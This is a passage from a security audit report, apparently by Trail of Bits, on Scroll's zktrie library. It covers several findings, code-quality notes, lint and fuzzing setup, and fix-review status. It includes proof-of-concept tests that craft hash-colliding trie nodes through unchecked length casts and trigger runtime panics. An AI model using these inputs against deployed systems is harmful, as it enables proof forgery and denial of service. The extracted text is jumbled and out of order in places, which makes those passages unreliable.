have the same prefix and are then padded with different bytes with that length will cause the Go library to interpret only the common prefix of these nodes. The following test showcases this exploit. #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); // common prefix let nd = &hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b648640101 00000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap(); // create node1 with prefix padded by zeroes let mut vec_nd = nd.to_vec(); let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut zero_padd_data); let node1 = ZkTrieNode::parse(&vec_nd); // create node2 with prefix padded by ones let mut vec_nd = nd.to_vec(); let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut one_padd_data); let node2 = ZkTrieNode::parse(&vec_nd); // create node3 with just the prefix let node3 = ZkTrieNode::parse(&hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a8 39ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f 8b00").unwrap()); // all hashes are equal assert_eq!(node1.node_hash(), node2.node_hash()); assert_eq!(node1.node_hash(), node3.node_hash()); } Figure 19.2: A test showing three different leaf nodes with colliding hashes This finding also allows an attacker to cause a runtime error by choosing the data array with the appropriate length that will cause the cast to result in a negative number. Figure 19.2 shows a test that triggers the runtime error for the parse function: #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); let data = vec![0u8; c_int::MAX as usize + 1]; println!("{:?}", data.len() as c_int); let _nd = ZkTrieNode::parse(&data); } // running 1 test // -2147483648 // panic: runtime error: gobytes: length out of range // goroutine 17 [running, locked to thread]: _cgo_gotypes.go:102 // main._Cfunc_GoBytes(...) // // main.NewTrieNode.func1(0x14000062de8?, 0x80000000) // /zktrie/lib.go:78 +0x50 // main.NewTrieNode(0x14000062e01?, 0x2680?) /zktrie/lib.go:78 +0x1c // Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array Exploit Scenario An attacker provides two different byte arrays that will have the same node_hash, breaking the assumption that such nodes are hard to obtain. Recommendations Short term, have the code perform the cast in a checked manner by using the c_int::try_from method to allow validation if the conversion succeeds. Determine whether the Rust functions should allow arbitrary length inputs; document the length requirements and assumptions. Long term, regularly run Clippy in pedantic mode to find and fix all potentially dangerous casts. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Data Handling The safe handling of user inputs and data processed by the system Documentation The presence of comprehensive and readable codebase documentation Maintenance The timely maintenance of system components to mitigate risk Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Findings We identified the following code quality issues through manual and automatic code review. ● Unnecessary parentheses on function call // NewSecure creates a trie // SecureBinaryTrie bypasses all the buffer mechanism in *Database, it directly uses the // underlying diskdb func NewZkTrie(root zkt.Byte32, db ZktrieDatabase) (*ZkTrie, error) { maxLevels := NodeKeyValidBytes * 8 tree, err := NewZkTrieImplWithRoot((db), zkt.NewHashFromBytes(root.Bytes()), maxLevels) Figure C.1: zktrie/trie/zk_trie.go#49–54 ● Typo in code comment // reduce 2 fieds into one Figure C.2: types/util.go#L8-L8 ● Copy-pasted code comment // ErrNodeKeyAlreadyExists is used when a node key already exists. ErrInvalidField = errors.New("Key not inside the Finite Field") Figure C.3: zktrie/trie/zk_trie_impl.go#20–21 ● Empty if branch if e != nil { //fmt.Println("err on NodeTypeEmpty mt.addNode ", e) } return r, e Figure C.4: zktrie/trie/zk_trie_impl.go#190–193 ● Superfluous nil error check if err != nil { return err } return nil Figure C.5: zktrie/trie/zk_trie_impl.go#120– ● Potential panic in function returning Result. Instead, the function should return a Result with the appropriate message. pub fn update_account( &mut self, key: &[u8], acc_fields: &AccountData, ) -> Result<(), ErrString> { let acc_buf: &[u8; FIELDSIZE * ACCOUNTFIELDS] = unsafe { let ptr = acc_fields.as_ptr(); ptr.cast::<[u8; FIELDSIZE * ACCOUNTFIELDS]>() .as_ref() .expect("casted ptr can not be null") Figure C.6: zktrie/src/lib.rs#279–288 ● Typo in code comment // ValuePreimage can store at most 256 byte32 as fields (represnted by BIG-ENDIAN integer) Figure C.7: “represnted” should be “represented” (zktrie/trie/zk_trie_node.go#41) ● Redundant error handling. The following code should simply check whether err!= nil and then return nil, err. if err == ErrKeyNotFound { return nil, ErrKeyNotFound } else if err != nil { return nil, err } Figure C.8: zktrie/trie/zk_trie_impl.go#508–512 ● Typo in variable name. The variables should read FIELD instead of FILED. static FILED_ERROR_READ: &str = "invalid input field"; static FILED_ERROR_OUT: &str = "output field fail"; Figure C.9: zktrie/src/lib.rs#309–310 ● The difference between NewHashFromBytes and NewHashFromBytesChecked is not explicitly documented. NewHashFromBytes truncates its input, while NewHashFromCheckedBytes returns an error if the input is the wrong length. // NewHashFromBytes returns a *Hash from a byte array considered to be // a represent of big-endian integer, it swapping the endianness // in the process. func NewHashFromBytes(b []byte) *Hash { var h Hash copy(h[:], ReverseByteOrder(b)) return &h } // NewHashFromCheckedBytes is the intended method to get a *Hash from a byte array // that previously has ben generated by the Hash.Bytes() method. so it check the // size of bytes to be expected length func NewHashFromCheckedBytes(b []byte) (*Hash, error) { if len(b) != HashByteLen { return nil, fmt.Errorf("expected %d bytes, but got %d bytes", HashByteLen, len(b)) } return NewHashFromBytes(b), nil } Figure C.10: types/hash.go#111–128 ● Unclear comment. The “create-delete issue” should be documented. //mitigate the create-delete issue: do not delete unexisted key Figure C.11: trie/zk_trie.go#118 ● TrieDelete swallows errors. This error should be propagated to the Rust bindings like other error returns. // delete leaf, silently omit any error //export TrieDelete func TrieDelete(p C.uintptr_t, key_c *C.uchar, key_sz C.int) { h := cgo.Handle(p) tr := h.Value().(*trie.ZkTrie) key := C.GoBytes(unsafe.Pointer(key_c), key_sz) tr.TryDelete(key) } Figure C.12: lib.go#243– D. Automated Analysis Tool Configuration As part of this assessment, we used the tools described below to perform automated testing of the codebase. D.1. golangci-lint We used the static analyzer aggregator golangci-lint to quickly analyze the codebase. D.2. Semgrep We used the static analyzer Semgrep to search for weaknesses in the source code repository. Note that these rule sets will output repeated results, which should be ignored. git clone git@github.com:dgryski/semgrep-go.git git clone https://github.com/0xdea/semgrep-rules semgrep --metrics=off --sarif --config p/r2c-security-audit semgrep --metrics=off --sarif --config p/trailofbits semgrep --metrics=off --sarif --config https://semgrep.dev/p/gosec semgrep --metrics=off --sarif --config https://raw.githubusercontent.com/snowflakedb/gosnowflake/master/.semgrep.yml semgrep --metrics=off --sarif --config semgrep-go semgrep --metrics=off --sarif --config semgrep-rules Figure D.1: The commands used to run Semgrep D.3. CodeQL We analyzed the Go codebase with ’s private CodeQL queries. We recommend that Scroll review CodeQL’s licensing policies if it intends to run CodeQL. # Create the go database codeql database create codeql.db --language=go # Run all go queries codeql database analyze codeql.db --additional-packs ~/.codeql/codeql-repo --format=sarif-latest --output=codeql_tob_all.sarif -- tob-go-all Figure D.2: Commands used to run CodeQL D.4. go cover We ran the go cover tool with the following command on both the trie and types folders to obtain a test coverage report: go test -cover -coverprofile c.out && go tool cover -html=c.out Note that this needs to be run separately for each folder. D.5. cargo audit This tool audits Cargo.lock against the RustSec advisory database. This tool did not reveal any findings but should be run every time new dependencies are included in the codebase. D.6. cargo-llvm-cov cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command to generate a coverage report for the Rust tests. D.7. Clippy The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool. Clippy warns about casting operations from usize to c_int that resulted in finding TOB-ZKTRIE-19. E. Go Fuzzing Harness During the assessment, we wrote a fuzzing harness for the Merkle tree proof verifier function. Because native Go does not support all necessary types, some proof structure types had to be manually constructed. Some parts of the proof were built naively, and the fuzzing harness can be iteratively improved by Scroll’s team. Running the go test -fuzz=FuzzVerifyProofZkTrie command will start the fuzzing campaign. // Truncate or pad array to length sz func padtolen(arr []byte, sz int) []byte { if len(arr) < sz { arr = append(arr, bytes.Repeat([]byte{0}, sz-len(arr))...) } else { arr = arr[:sz] } return arr } func FuzzVerifyProofZkTrie(f *testing.F) { zkTrie, _ := newZkTrieImpl(NewZkTrieMemoryDb(), 10) k := zkt.NewHashFromBytes(bytes.Repeat([]byte("a"), 32)) vp := []zkt.Byte32{*zkt.NewByte32FromBytes(bytes.Repeat([]byte("b"), 32))} node := NewLeafNode(k, 1, vp) f.Fuzz(func(t *testing.T, existence bool, depth uint, notempties []byte, siblings []byte, nodeAuxA []byte, nodeAuxB []byte) { notempties = padtolen(notempties, 30) typedsiblings := make([]*zkt.Hash, 10) for i := range typedsiblings { typedsiblings[i] = zkt.NewHashFromBytes(padtolen(siblings, 32)) } typedata := [30]byte{} copy(typedata[:], notempties) var nodeAux *NodeAux if !existence { nodeAux = &NodeAux{ Key: zkt.NewHashFromBytes(padtolen(nodeAuxA, 32)), Value: zkt.NewHashFromBytes(padtolen(nodeAuxB, 32)), } } proof := &Proof{ Existence: existence, depth: notempties: typedata, Siblings: depth, typedsiblings, NodeAux: nodeAux, } if VerifyProofZkTrie(zkTrie.rootHash, proof, node) { panic("valid proof") } }) } Figure E.1: The fuzzing harness for VerifyProofZkTrie F. Go Randomized Test During the assessment, we wrote a simple randomized test to verify that the behavior of the zkTrie matches an ideal tree (i.e., an associative array). The test currently fails due to the verifier misbehavior described in this report. The test can be run with go test -v -run TestZkTrie_BasicRandomTest. // Basic randomized test to verify the trie's set, get, and remove features. func TestZkTrie_BasicRandomTest(t *testing.T) { root := zkt.Byte32{} db := NewZkTrieMemoryDb() zkTrie, err := NewZkTrie(root, db) assert.NoError(t, err) idealTrie := make(IdealTrie) const NUM_BYTES = 32 const NUM_KEYS = 1024 keys := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) data := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) // PHASE 1: toss a coin and set elements (Works) for i := 0; i < len(keys); i++ { if toss(t) == true { set(t, zkTrie, idealTrie, keys[i], data[i]) } } // PHASE 2: toss a coin and get elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { get(t, zkTrie, idealTrie, keys[i]) } } // PHASE 3: toss a coin and remove elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { remove(t, zkTrie, idealTrie, keys[i]) } } } Figure F.1: A basic randomized test for ZkTrie (trie/zk_trie_test.go) type IdealTrie = map[string][]byte func random_hex_str(t *testing.T, str_bytes int) string { outBytes := make([]byte, str_bytes) n, err := rand.Read(outBytes) assert.NoError(t, err) assert.Equal(t, n, str_bytes) return hex.EncodeToString(outBytes) } func random_hex_str_array(t *testing.T, str_bytes int, array_size int) []string { out := []string{} for i := 0; i < array_size; i++ { hex_str := random_hex_str(t, str_bytes) out = append(out, hex_str) } return out } // Randomly returns true or false func toss(t *testing.T) bool { n, err := rand.Int(rand.Reader, big.NewInt(2)) assert.NoError(t, err) return (n.Cmp(big.NewInt(1)) == 0) } func hex_to_bytes(t *testing.T, hex_str string) []byte { key, err := hex.DecodeString(hex_str) assert.NoError(t, err) return key } func bytes_to_byte32(b []byte) []zkt.Byte32 { if len(b)%32 != 0 { panic("unaligned arrays are unsupported") } l := len(b) / 32 out := make([]zkt.Byte32, l) i := 0 for i < l { copy(out[i][:], b[i*32:(i+1)*32]) i += 1 } return out } // Tests that an inclusion proof for a given key can be generated and verified. func verify_inclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.True(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.NoError(t, err) assert.NotNil(t, hash) } // Tests that a non-inclusion proof for a given key can be generated and verified. func verify_noninclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.False(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.Error(t, err) assert.Nil(t, hash) } // Verifies that adding elements from the trie works. func set(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string, data_hex string) { vFlag := uint32(1) key := hex_to_bytes(t, key_hex) data := hex_to_bytes(t, data_hex) err := zkTrie.TryUpdate(key, vFlag, bytes_to_byte32(data)) assert.NoError(t, err) idealTrie[key_hex] = data verify_inclusion(t, zkTrie, key) } // Verifies that retrieving elements from the trie works. func get(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) ideal_data, ok := idealTrie[key_hex] if ok { trie_data, err := zkTrie.TryGet(key) assert.NoError(t, err) assert.True(t, reflect.DeepEqual(trie_data, ideal_data)) verify_inclusion(t, zkTrie, key) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) verify_noninclusion(t, zkTrie, key) } } // Verifies that removing elements from the trie works. func remove(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) _, ok := idealTrie[key_hex] if ok { delete(idealTrie, key_hex) err := zkTrie.TryDelete(key) assert.NoError(t, err) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) } verify_noninclusion(t, zkTrie, key) } Figure F.2: Helper functions for TestZkTrie_BasicRandomTest (trie/zk_trie_test.go) G. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On September 13, 2023, reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. received fix PRs for findings TOB-ZKTRIE-1, TOB-ZKTRIE-4, TOB-ZKTRIE-5, TOB-ZKTRIE-16, TOB-ZKTRIE-18, and TOB-ZKTRIE-19. Scroll did not provide fix PRs for the medium-severity findings TOB-ZKTRIE-2, TOB-ZKTRIE-10, and TOB-ZKTRIE-12; the low-severity finding TOB-ZKTRIE-11; or the remaining findings, all of which are of informational severity. In summary, of the 19 issues described in this report, Scroll has resolved five issues and has partially resolved one issue. No fix PRs were provided for the remaining 13 issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below. ID Title Status 1 2 3 4 5 6 7 Lack of domain separation allows proof forgery Resolved Lack of proof validation causes denial of service on the verifier Undetermined Two incompatible ways to generate proofs Undetermined BuildZkTrieProof does not populate NodeAux.Value Resolved Leaf nodes with different values may have the same hash Resolved Empty UpdatePreimage function body Undetermined CanonicalValue is not canonical Undetermined 8 9 10 11 ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined Unused key argument on the bridge_prove_write function Undetermined The PreHandlingElems function panics with an empty elems array Undetermined The hash_external function panics with integers larger than 32 bytes Undetermined 12 Mishandling of cgo.Handles causes runtime errors Undetermined 13 Unnecessary unsafe pointer manipulation in Node.Data() Undetermined 14 NewNodeFromBytes does not fully validate its input Undetermined 15 init_hash_scheme is not thread-safe Undetermined 16 Safe-Rust ZkMemoryDb interface is not thread-safe Resolved Detailed Fix Review Results TOB-ZKTRIE-1: Lack of domain separation allows proof forgery Resolved in PR #11. Domain separation is now performed between leaves, Byte32 values, and several different types of internal branches. Additionally, sequence-length domain separation has been added to HashElems as part of the fixes for finding TOB-ZKTRIE-5. HashElemsWithDomain does not add its own domain separation and is potentially error-prone. It appears to be used correctly, but the Scroll team should consider making HashElemsWithDomain private to prevent misuse. TOB-ZKTRIE-2: Lack of proof validation causes denial of service on the verifier Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-3: Two incompatible ways to generate proofs Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-4: BuildZkTrieProof does not populate NodeAux.Value Resolved in PR #11. The BuildZkTrieProof function now calls ValueHash, which populates NodeAux. TOB-ZKTRIE-5: Leaf nodes with different values may have the same hash Resolved in PR #11. NodeHash now uses HandlingElemsAndByte32, which calls HashElems, which adds domain separation based on the length of its input to recursive calls in the internal Merkle tree structure. TOB-ZKTRIE-6: Empty UpdatePreimage function body Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-7: CanonicalValue is not canonical Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-8: ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-9: Unused key argument on the bridge_prove_write function Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-10: The PreHandlingElems function panics with an empty elems array Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-11: The hash_external function panics with integers larger than 32 bytes Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-12: Mishandling of cgo.Handles causes runtime errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-13: Unnecessary unsafe pointer manipulation in Node.Data() Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-14: NewNodeFromBytes does not fully validate its input Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-15: init_hash_scheme is not thread-safe Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-16: Safe-Rust ZkMemoryDb interface is not thread-safe Resolved in PR #12. The use of the non-thread-safe function Database.Init was replaced with Put, which is thread-safe. The Scroll team should consider adding cautionary documentation to Init to prevent its misuse in the future. TOB-ZKTRIE-17: Some Node functions return the zero hash instead of errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-18: get_account can read past the buffer Partially resolved in PR #13. The get_account function now verifies the slice length. However, the function may still misbehave on platforms where Go’s int type is 32 bits and if given a value above unlikely to cause problems in practice. However, adding assert calls to ZkTrie::get and , which may cause the cast to overflow. This seems extremely 31 2 TrieGetSize to restrict the size to be below a reasonable upper bound such as prevent this issue entirely by causing the program to terminate if the affected code is misused on a problematic platform. 30 2 would TOB-ZKTRIE-19: Unchecked usize to c_int casts allow hash collisions by length misinterpretation Resolved in PR #14. This implementation will now crash instead of triggering a bug. The Scroll team should watch for possible denials of service when deploying the software. H. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. +6. Empty UpdatePreimage function body Severity: Informational Difficulty: N/A Type: Auditing and Logging Finding ID: TOB-ZKTRIE-6 Target: trie/zk_trie_database.go Description The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or a message that is logged. This would prevent the function from being used without any warning. func (db *Database) UpdatePreimage([]byte, *big.Int) {} Figure 6.1: zktrie/trie/zk_trie_database.go#19 Recommendations Short term, add an unimplemented message to the function body, through either a panic or message logging. +7. CanonicalValue is not canonical Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-ZKTRIE-7 Target: trie/zk_trie_node.go Description The CanonicalValue function does not uniquely generate a representation of Node structures, allowing different Nodes with the same CanonicalValue, and two nodes with the same NodeHash but different CanonicalValues. ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the first 24 fields can be compressed, so CanonicalValue truncates CompressedFlags to the first 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags field of a Node. Figure 7.3 shows how this can be used to construct two different Node structs that have the same CanonicalValue. // CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields // from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being // stored in backend storage func (n *Node) CanonicalValue() []byte { switch n.Type { case NodeTypeParent: // {Type || ChildL || ChildR} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.ChildL.Bytes()...) bytes = append(bytes, n.ChildR.Bytes()...) return bytes case NodeTypeLeaf: // {Type || Data...} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.NodeKey.Bytes()...) tmp := make([]byte, 4) compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage)) binary.LittleEndian.PutUint32(tmp, compressedFlag) bytes = append(bytes, tmp...) for _, elm := range n.ValuePreimage { bytes = append(bytes, elm[:]...) } bytes = append(bytes, 0) return bytes case NodeTypeEmpty: // { Type } return []byte{byte(n.Type)} default: return []byte{} } } Figure 7.1: This figure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187–214) // NewLeafNode creates a new leaf node. func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node { return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage} } Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#55–58) // CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail. func TestZkTrie_CanonicalValue1(t *testing.T) { key, err := hex.DecodeString("0000000000000000000000000000000000000000000000000000000000000000") assert.NoError(t, err) vPreimage := []zkt.Byte32{{0}} k := zkt.NewHashFromBytes(key) vFlag0 := uint32(0x00ffffff) vFlag1 := uint32(0xffffffff) lf0 := NewLeafNode(k, vFlag0, vPreimage) lf1 := NewLeafNode(k, vFlag1, vPreimage) // These two assertions should never simultaneously pass. assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags) assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue())) } Figure 7.3: A test showing that one can construct different nodes with the same CanonicalValue // PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem // it also has the compressed byte32 func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) { ret := make([]*big.Int, len(elems)) var err error for i, elem := range elems { if flagArray&(1<> 8 n.ValuePreimage = make([]zkt.Byte32, preimageLen) curPos := zkt.HashByteLen + 4 if len(b) < curPos+preimageLen*32+1 { return nil, ErrNodeBytesBadSize } … if preImageSize != 0 { if len(b) < curPos+preImageSize { return nil, ErrNodeBytesBadSize } n.KeyPreimage = new(zkt.Byte32) copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize]) } case NodeTypeEmpty: break Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78–111) Recommendations Short term, add checks of the total byte array length and the preimageLen field to NewNodeFromBytes. Long term, explicitly document the serialization format for nodes, and add tests for incorrect serialized nodes. +15. init_hash_scheme is not thread-safe Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-ZKTRIE-15 Target: src/lib.rs, lib.go, c.go, types/hash.go Description zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon. The init_hash_scheme function, shown in figure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in figure 15.2. pub fn init_hash_scheme(f: HashScheme) { unsafe { InitHashScheme(f) } } Figure 15.1: src/lib.rs#67–69 // notice the function must use C calling convention //export InitHashScheme func InitHashScheme(f unsafe.Pointer) { hash_f := C.hashF(f) C.init_hash_scheme(hash_f) zkt.InitHashScheme(hash_external) } Figure 15.2: lib.go#65–71 InitHashScheme calls two other functions: first, a C function called init_hash_scheme and second, a second Go function (this time, in the hash module) called InitHashScheme. This second Go function is synchronized with a sync.Once object, as shown in figure 15.3. func InitHashScheme(f func([]*big.Int) (*big.Int, error)) { setHashScheme.Do(func() { hashScheme = f }) } Figure 15.3: types/hash.go#29– However, the C function init_hash_scheme, shown in figure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race. void init_hash_scheme(hashF f){ hash_scheme = f; } Figure 15.4: c.go#13–15 However, the only potential data race comes from multi-threaded initialization, which contradicts the usage recommendation in the README, shown in figure 15.5. We must init the crate with a poseidon hash scheme before any actions: … zktrie_util::init_hash_scheme(hash_scheme); Figure 15.5: README.md#8–24 Recommendations Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go. Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the “How Safe and Unsafe Interact” section of the Rustonomicon. +16. Safe-Rust ZkMemoryDb interface is not thread-safe Severity: High Difficulty: High Type: Undefined Behavior Finding ID: TOB-ZKTRIE-16 Target: lib.go,src/lib.rs,trie/zk_trie_database.go Description The Go function Database.Init, shown in figure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required. // Init flush db with batches of k/v without locking func (db *Database) Init(k, v []byte) { db.db[string(k)] = v } Figure 16.1: trie/zk_trie_database.go#40–43 However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (figure 16.2) via the cgo function InitDbByNode (figure 16.3): pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> { let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) }; if ret_ptr.is_null() { Ok(()) } else { Err(ret_ptr.into()) } } Figure 16.2: src/lib.rs#171–178 // flush db with encoded trie-node bytes //export InitDbByNode func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.DecodeSMTProof(bt) if err != nil { return C.CString(err.Error()) } else if n == nil { //skip magic string return nil } hash, err := n.NodeHash() if err != nil { return C.CString(err.Error()) } db.Init(hash[:], n.CanonicalValue()) return nil } Figure 16.3: lib.go#147–170 Safe Rust is required to never invoke undefined behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undefined behavior through that wrapper. (Refer to the “How Safe and Unsafe Interact” section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rust’s borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl. pub fn new_trie(&mut self, root: &Hash) -> Option { let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) }; if ret.is_null() { None } else { Some(ZkTrie { trie: ret }) } } Figure 16.4: src/lib.rs#181–189 func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) root := C.GoBytes(unsafe.Pointer(root_c), 32) zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db) if err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(zktrie)) } Figure 16.5: lib.go#174–185 func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) { return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels) } // NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one // will open that one, if not, will create a new one. func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) { mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true} mt.rootHash = root if *root != zkt.HashZero { _, err := mt.GetNode(mt.rootHash) if err != nil { return nil, err } } return &mt, nil } Figure 16.6: trie/zk_trie_impl.go#56–72 Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get(), one can trigger a data race from safe Rust. Exploit Scenario A Rust-based library consumer uses threads to improve 